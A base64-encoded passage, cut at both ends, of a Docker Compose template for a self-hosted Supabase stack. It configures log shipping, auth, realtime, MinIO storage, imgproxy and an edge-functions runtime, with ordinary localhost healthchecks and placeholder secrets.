dvcmtzIGJ5IHRoZSBhc3N1bXB0aW9uIHRoYXQgY29udGFpbmVycyBhcmUgc3RhcnRlZCBpbiB0aGVcbiAgICAjIGZvbGxvd2luZyBvcmRlcjogdmVjdG9yID4gZGIgPiBsb2dmbGFyZSA+IGtvbmdcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwL2FuYWx5dGljcy92MS9hcGkvbG9ncz9zb3VyY2VfbmFtZT1wb3N0Z3Jlcy5sb2dzJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9mdW5jdGlvbnM6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuZnVuY3Rpb25zXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWRlbm8tcmVsYXktbG9ncyZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfc3RvcmFnZTpcbiAgICB0eXBlOiAnaHR0cCdcbiAgICBpbnB1dHM6XG4gICAgICAtIHN0b3JhZ2VfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1zdG9yYWdlLmxvZ3MucHJvZC4yJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9rb25nOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0ga29uZ19sb2dzXG4gICAgICAtIGtvbmdfZXJyXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWNsb3VkZmxhcmUubG9ncy5wcm9kJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuIgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGVudmlyb25tZW50OgogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICBjb21tYW5kOgogICAgICAtICctLWNvbmZpZycKICAgICAgLSBldGMvdmVjdG9yL3ZlY3Rvci55bWwKICBzdXBhYmFzZS1yZXN0OgogICAgaW1hZ2U6ICdwb3N0Z3Jlc3QvcG9zdGdyZXN0OnYxMi4yLjEyJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEdSU1RfREJfVVJJPXBvc3RncmVzOi8vYXV0aGVudGljYXRvcjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUEdSU1RfREJfU0NIRU1BUz0ke1BHUlNUX0RCX1NDSEVNQVM6LXB1YmxpYyxzdG9yYWdlLGdyYXBocWxfcHVibGljfScKICAgICAgLSBQR1JTVF9EQl9BTk9OX1JPTEU9YW5vbgogICAgICAtICdQR1JTVF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFBHUlNUX0RCX1VTRV9MRUdBQ1lfR1VDUz1mYWxzZQogICAgICAtICdQR1JTVF9BUFBfU0VUVElOR1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnUEdSU1RfQVBQX1NFVFRJTkdTX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgIGNvbW1hbmQ6IHBvc3RncmVzdAogICAgZXhjbHVkZV9mcm9tX2hjOiB0cnVlCiAgc3VwYWJhc2UtYXV0aDoKICAgIGltYWdlOiAnc3VwYWJhc2UvZ290cnVlOnYyLjE3NC4wJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5OTk5L2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIEdPVFJVRV9BUElfSE9TVD0wLjAuMC4wCiAgICAgIC0gR09UUlVFX0FQSV9QT1JUPTk5OTkKICAgICAgLSAnQVBJX0VYVEVSTkFMX1VSTD0ke0FQSV9FWFRFUk5BTF9VUkw6LWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDB9JwogICAgICAtIEdPVFJVRV9EQl9EUklWRVI9cG9zdGdyZXMKICAgICAgLSAnR09UUlVFX0RCX0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX2F1dGhfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ0dPVFJVRV9TSVRFX1VSTD0ke1NFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ0dPVFJVRV9VUklfQUxMT1dfTElTVD0ke0FERElUSU9OQUxfUkVESVJFQ1RfVVJMU30nCiAgICAgIC0gJ0dPVFJVRV9ESVNBQkxFX1NJR05VUD0ke0RJU0FCTEVfU0lHTlVQOi1mYWxzZX0nCiAgICAgIC0gR09UUlVFX0pXVF9BRE1JTl9ST0xFUz1zZXJ2aWNlX3JvbGUKICAgICAgLSBHT1RSVUVfSldUX0FVRD1hdXRoZW50aWNhdGVkCiAgICAgIC0gR09UUlVFX0pXVF9ERUZBVUxUX0dST1VQX05BTUU9YXV0aGVudGljYXRlZAogICAgICAtICdHT1RSVUVfSldUX0VYUD0ke0pXVF9FWFBJUlk6LTM2MDB9JwogICAgICAtICdHT1RSVUVfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX0VNQUlMX0VOQUJMRUQ9JHtFTkFCTEVfRU1BSUxfU0lHTlVQOi10cnVlfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX0FOT05ZTU9VU19VU0VSU19FTkFCTEVEPSR7RU5BQkxFX0FOT05ZTU9VU19VU0VSUzotZmFsc2V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX0FVVE9DT05GSVJNPSR7RU5BQkxFX0VNQUlMX0FVVE9DT05GSVJNOi1mYWxzZX0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX0FETUlOX0VNQUlMPSR7U01UUF9BRE1JTl9FTUFJTH0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX0hPU1Q9JHtTTVRQX0hPU1R9JwogICAgICAtICdHT1RSVUVfU01UUF9QT1JUPSR7U01UUF9QT1JUOi01ODd9JwogICAgICAtICdHT1RSVUVfU01UUF9VU0VSPSR7U01UUF9VU0VSfScKICAgICAgLSAnR09UUlVFX1NNVFBfUEFTUz0ke1NNVFBfUEFTU30nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX1NFTkRFUl9OQU1FPSR7U01UUF9TRU5ERVJfTkFNRX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVVJMUEFUSFNfSU5WSVRFPSR7TUFJTEVSX1VSTFBBVEhTX0lOVklURTotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19DT05GSVJNQVRJT049JHtNQUlMRVJfVVJMUEFUSFNfQ09ORklSTUFUSU9OOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX1JFQ09WRVJZPSR7TUFJTEVSX1VSTFBBVEhTX1JFQ09WRVJZOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9VUkxQQVRIU19FTUFJTF9DSEFOR0U6LS9hdXRoL3YxL3ZlcmlmeX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0lOVklURT0ke01BSUxFUl9URU1QTEFURVNfSU5WSVRFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfQ09ORklSTUFUSU9OPSR7TUFJTEVSX1RFTVBMQVRFU19DT05GSVJNQVRJT059JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19SRUNPVkVSWT0ke01BSUxFUl9URU1QTEFURVNfUkVDT1ZFUll9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19NQUdJQ19MSU5LPSR7TUFJTEVSX1RFTVBMQVRFU19NQUdJQ19MSU5LfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfRU1BSUxfQ0hBTkdFPSR7TUFJTEVSX1RFTVBMQVRFU19FTUFJTF9DSEFOR0V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0NPTkZJUk1BVElPTj0ke01BSUxFUl9TVUJKRUNUU19DT05GSVJNQVRJT059JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX1JFQ09WRVJZPSR7TUFJTEVSX1NVQkpFQ1RTX1JFQ09WRVJZfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19NQUdJQ19MSU5LPSR7TUFJTEVSX1NVQkpFQ1RTX01BR0lDX0xJTkt9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9TVUJKRUNUU19FTUFJTF9DSEFOR0V9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1NVQkpFQ1RTX0lOVklURT0ke01BSUxFUl9TVUJKRUNUU19JTlZJVEV9JwogICAgICAtICdHT1RSVUVfRVhURVJOQUxfUEhPTkVfRU5BQkxFRD0ke0VOQUJMRV9QSE9ORV9TSUdOVVA6LXRydWV9JwogICAgICAtICdHT1RSVUVfU01TX0FVVE9DT05GSVJNPSR7RU5BQkxFX1BIT05FX0FVVE9DT05GSVJNOi10cnVlfScKICByZWFsdGltZS1kZXY6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3JlYWx0aW1lOnYyLjM0LjQ3JwogICAgY29udGFpbmVyX25hbWU6IHJlYWx0aW1lLWRldi5zdXBhYmFzZS1yZWFsdGltZQogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1zU2ZMJwogICAgICAgIC0gJy0taGVhZCcKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICAgIC0gJy1IJwogICAgICAgIC0gJ0F1dGhvcml6YXRpb246IEJlYXJlciAke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo0MDAwL2FwaS90ZW5hbnRzL3JlYWx0aW1lLWRldi9oZWFsdGgnCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1JUPTQwMDAKICAgICAgLSAnREJfSE9TVD0ke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn0nCiAgICAgIC0gJ0RCX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSBEQl9VU0VSPXN1cGFiYXNlX2FkbWluCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ0RCX05BTUU9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdEQl9BRlRFUl9DT05ORUNUX1FVRVJZPVNFVCBzZWFyY2hfcGF0aCBUTyBfcmVhbHRpbWUnCiAgICAgIC0gREJfRU5DX0tFWT1zdXBhYmFzZXJlYWx0aW1lCiAgICAgIC0gJ0FQSV9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIEZMWV9BTExPQ19JRD1mbHkxMjMKICAgICAgLSBGTFlfQVBQX05BTUU9cmVhbHRpbWUKICAgICAgLSAnU0VDUkVUX0tFWV9CQVNFPSR7U0VDUkVUX1BBU1NXT1JEX1JFQUxUSU1FfScKICAgICAgLSAnRVJMX0FGTEFHUz0tcHJvdG9fZGlzdCBpbmV0X3RjcCcKICAgICAgLSBFTkFCTEVfVEFJTFNDQUxFPWZhbHNlCiAgICAgIC0gIkROU19OT0RFUz0nJyIKICAgICAgLSBSTElNSVRfTk9GSUxFPTEwMDAwCiAgICAgIC0gQVBQX05BTUU9cmVhbHRpbWUKICAgICAgLSBTRUVEX1NFTEZfSE9TVD10cnVlCiAgICAgIC0gTE9HX0xFVkVMPWVycm9yCiAgICAgIC0gUlVOX0pBTklUT1I9dHJ1ZQogICAgICAtIEpBTklUT1JfSU5URVJWQUw9NjAwMDAKICAgIGNvbW1hbmQ6ICJzaCAtYyBcIi9hcHAvYmluL21pZ3JhdGUgJiYgL2FwcC9iaW4vcmVhbHRpbWUgZXZhbCAnUmVhbHRpbWUuUmVsZWFzZS5zZWVkcyhSZWFsdGltZS5SZXBvKScgJiYgL2FwcC9iaW4vc2VydmVyXCJcbiIKICBzdXBhYmFzZS1taW5pbzoKICAgIGltYWdlOiAnZ2hjci5pby9jb29sbGFic2lvL21pbmlvOlJFTEVBU0UuMjAyNS0xMC0xNVQxNy0yOS01NVonCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTUlOSU9fUk9PVF9VU0VSPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnTUlOSU9fUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgY29tbWFuZDogJ3NlcnZlciAtLWNvbnNvbGUtYWRkcmVzcyAiOjkwMDEiIC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIG1jCiAgICAgICAgLSByZWFkeQogICAgICAgIC0gbG9jYWwKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgdm9sdW1lczoKICAgICAgLSAnLi92b2x1bWVzL3N0b3JhZ2U6L2RhdGEnCiAgbWluaW8tY3JlYXRlYnVja2V0OgogICAgaW1hZ2U6IG1pbmlvL21jCiAgICByZXN0YXJ0OiAnbm8nCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTUlOSU9fUk9PVF9VU0VSPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnTUlOSU9fUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtbWluaW86CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudHJ5cG9pbnQ6CiAgICAgIC0gL2VudHJ5cG9pbnQuc2gKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2VudHJ5cG9pbnQuc2gKICAgICAgICB0YXJnZXQ6IC9lbnRyeXBvaW50LnNoCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuL3Vzci9iaW4vbWMgYWxpYXMgc2V0IHN1cGFiYXNlLW1pbmlvIGh0dHA6Ly9zdXBhYmFzZS1taW5pbzo5MDAwICR7TUlOSU9fUk9PVF9VU0VSfSAke01JTklPX1JPT1RfUEFTU1dPUkR9O1xuL3Vzci9iaW4vbWMgbWIgLS1pZ25vcmUtZXhpc3Rpbmcgc3VwYWJhc2UtbWluaW8vc3R1YjtcbmV4aXQgMFxuIgogIHN1cGFiYXNlLXN0b3JhZ2U6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3N0b3JhZ2UtYXBpOnYxLjE0LjYnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1kYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBzdXBhYmFzZS1yZXN0OgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9zdGFydGVkCiAgICAgIGltZ3Byb3h5OgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9zdGFydGVkCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo1MDAwL3N0YXR1cycKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZFUl9QT1JUPTUwMDAKICAgICAgLSBTRVJWRVJfUkVHSU9OPWxvY2FsCiAgICAgIC0gTVVMVElfVEVOQU5UPWZhbHNlCiAgICAgIC0gJ0FVVEhfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vc3VwYWJhc2Vfc3RvcmFnZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSBEQl9JTlNUQUxMX1JPTEVTPWZhbHNlCiAgICAgIC0gU1RPUkFHRV9CQUNLRU5EPXMzCiAgICAgIC0gU1RPUkFHRV9TM19CVUNLRVQ9c3R1YgogICAgICAtICdTVE9SQUdFX1MzX0VORFBPSU5UPWh0dHA6Ly9zdXBhYmFzZS1taW5pbzo5MDAwJwogICAgICAtIFNUT1JBR0VfUzNfRk9SQ0VfUEFUSF9TVFlMRT10cnVlCiAgICAgIC0gU1RPUkFHRV9TM19SRUdJT049dXMtZWFzdC0xCiAgICAgIC0gJ0FXU19BQ0NFU1NfS0VZX0lEPSR7U0VSVklDRV9VU0VSX01JTklPfScKICAgICAgLSAnQVdTX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9NSU5JT30nCiAgICAgIC0gVVBMT0FEX0ZJTEVfU0laRV9MSU1JVD01MjQyODgwMDAKICAgICAgLSBVUExPQURfRklMRV9TSVpFX0xJTUlUX1NUQU5EQVJEPTUyNDI4ODAwMAogICAgICAtIFVQTE9BRF9TSUdORURfVVJMX0VYUElSQVRJT05fVElNRT0xMjAKICAgICAgLSBUVVNfVVJMX1BBVEg9dXBsb2FkL3Jlc3VtYWJsZQogICAgICAtIFRVU19NQVhfU0laRT0zNjAwMDAwCiAgICAgIC0gRU5BQkxFX0lNQUdFX1RSQU5TRk9STUFUSU9OPXRydWUKICAgICAgLSAnSU1HUFJPWFlfVVJMPWh0dHA6Ly9pbWdwcm94eTo4MDgwJwogICAgICAtIElNR1BST1hZX1JFUVVFU1RfVElNRU9VVD0xNQogICAgICAtIERBVEFCQVNFX1NFQVJDSF9QQVRIPXN0b3JhZ2UKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gUkVRVUVTVF9BTExPV19YX0ZPUldBUkRFRF9QQVRIPXRydWUKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi92YXIvbGliL3N0b3JhZ2UnCiAgaW1ncHJveHk6CiAgICBpbWFnZTogJ2RhcnRoc2ltL2ltZ3Byb3h5OnYzLjguMCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBpbWdwcm94eQogICAgICAgIC0gaGVhbHRoCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBJTUdQUk9YWV9MT0NBTF9GSUxFU1lTVEVNX1JPT1Q9LwogICAgICAtIElNR1BST1hZX1VTRV9FVEFHPXRydWUKICAgICAgLSAnSU1HUFJPWFlfRU5BQkxFX1dFQlBfREVURUNUSU9OPSR7SU1HUFJPWFlfRU5BQkxFX1dFQlBfREVURUNUSU9OOi10cnVlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi92YXIvbGliL3N0b3JhZ2UnCiAgc3VwYWJhc2UtbWV0YToKICAgIGltYWdlOiAnc3VwYWJhc2UvcG9zdGdyZXMtbWV0YTp2MC44OS4zJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQR19NRVRBX1BPUlQ9ODA4MAogICAgICAtICdQR19NRVRBX0RCX0hPU1Q9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdQR19NRVRBX0RCX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdfTUVUQV9EQl9OQU1FPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSBQR19NRVRBX0RCX1VTRVI9c3VwYWJhc2VfYWRtaW4KICAgICAgLSAnUEdfTUVUQV9EQl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogIHN1cGFiYXNlLWVkZ2UtZnVuY3Rpb25zOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9lZGdlLXJ1bnRpbWU6djEuNjcuNCcKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGVjaG8KICAgICAgICAtICdFZGdlIEZ1bmN0aW9ucyBpcyBoZWFsdGh5JwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ1NVUEFCQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ1NVUEFCQVNFX0FOT05fS0VZPSR7U0VSVklDRV9TVVBBQkFTRUFOT05fS0VZfScKICAgICAgLSAnU1VQQUJBU0VfU0VSVklDRV9ST0xFX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VTRVJWSUNFX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX0RCX1VSTD1wb3N0Z3Jlc3FsOi8vcG9zdGdyZXM6JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ1ZFUklGWV9KV1Q9JHtGVU5DVElPTlNfVkVSSUZZX0pXVDotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnLi92b2x1bWVzL2Z1bmN0aW9uczovaG9tZS9kZW5vL2Z1bmN0aW9ucycKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9mdW5jdGlvbnMvbWFpbi9pbmRleC50cwogICAgICAgIHRhcmdldDogL2hvbWUvZGVuby9mdW5jdGlvbnMvbWFpbi9pbmRleC50cwogICAgICAgIGNvbnRlbnQ6ICJpbXBvcnQgeyBzZXJ2ZSB9IGZyb20gJ2h0dHBzOi8vZGVuby5sYW5kL3N0ZEAwLjEzMS4wL2h0dHAvc2VydmVyLnRzJ1xuaW1wb3J0ICogYXMgam9zZSBmcm9tICdodHRwczovL2Rlbm8ubGFuZC94L2pvc2VAdjQuMTQuNC9pbmRleC50cydcblxuY29uc29sZS5sb2coJ21haW4gZnVuY3Rpb24gc3RhcnRlZCcpXG5cbmNvbnN0IEpXVF9TRUNSRVQgPSBEZW5vLmVudi5nZXQoJ0pXVF9TRUNSRVQnKVxuY29uc3QgVkVSSUZZX0pXVCA9IERlbm8uZW52LmdldCgnVkVSSUZZX0pXVCcpID09PSAndHJ1ZSdcblxuZnVuY3Rpb24gZ2V0QXV0aFRva2VuKHJlcTogUmVxdWVzdCkge1xuICBjb25zdCBhdXRoSGVhZGVyID0gcmVxLmhlYWRlcnMuZ2V0KCdhdXRob3JpemF0aW9uJylcbiAgaWYgKCFhdXRoSGVhZGVyKSB7XG4gICAgdGhyb3cgbmV3IEVycm9yKCdNaXNzaW5nIGF1dGhvcml6YXRpb24gaGVhZGVyJylcbiAgfVxuICBjb25zdCBbYmVhcmVyLCB0b2tlbl0gPSBhdXRoSGVhZGVyLnNwbGl0KCcgJylcbiAgaWYgKGJlYXJlciAhPT0gJ0JlYXJlcicpIHtcbiAgICB0aHJvdyBuZXcgRXJyb3IoYEF1dGggaGVhZGVyIGlzIG5vdCAnQmVhcmVyIHt0b2tlbn0nYClcbiAgfVxuICByZXR1cm4gdG9rZW5cbn1cblxuYXN5bmMgZnVuY3Rpb24gdmVyaWZ5SldUKGp3dDogc3RyaW5nKTogUHJvbWlzZTxib29sZWFuPiB7XG4gIGNvbnN0IGVuY29kZXIgPSBuZXcgVGV4dEVuY29kZXIoKVxuICBjb25zdCBzZWNyZXRLZXkgPSBlbmNvZGVyLmVuY29kZShKV1RfU0VDUkVUKVxuICB0cnkge1xuICAgIGF3YWl0IGpvc2Uuand0VmVyaWZ5KGp3dCwgc2VjcmV0S2V5KVxuICB9IGNhdGNoIChlcnIpIHtcbiAgICBjb25zb2xlLmVycm9yKGVycilcbiAgICByZXR1cm4gZmFsc2VcbiAgfVxuICByZXR1cm4gdHJ1ZVxufVxuXG5zZXJ2ZShhc3luYyAocmVxOiBSZXF1ZXN0KSA9PiB7XG4gIGlmIChyZXEubWV0aG9kICE9PSAnT1BUSU9OUycgJiYgVkVSS